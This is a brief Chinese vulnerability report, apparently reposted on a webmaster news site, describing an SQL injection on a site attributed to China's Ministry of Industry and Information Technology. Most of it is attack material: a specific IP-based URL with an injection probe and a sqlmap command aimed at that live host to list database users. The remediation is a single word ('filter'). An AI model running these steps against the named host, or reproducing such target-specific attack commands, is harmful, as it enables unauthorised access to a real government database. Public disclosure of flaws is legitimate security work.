工业和信息化部某站SQL注入漏洞下载

工业和信息化部某站SQL注入漏洞

http://219.239.97.51/chinacc/search2.asp?ClassID=&Field=&Keyword=1%27%22&page=2





sqlmap 跑一下:

 

sqlmap -u "http://219.239.97.51:80/chinacc/search2.asp?ClassID=&Field=&Keyword=1&page=2" --users

dbs:users:



 

修复方案:

过滤

上一篇: [公开漏洞]看处方ElasticSearch远程命令执行漏洞
下一篇: [公开漏洞]工业和信息化部某站SQL注入漏洞
当前位置:站长啦网站目录 » 站长资讯 » 站长新闻 » 漏洞预警 » 文章详细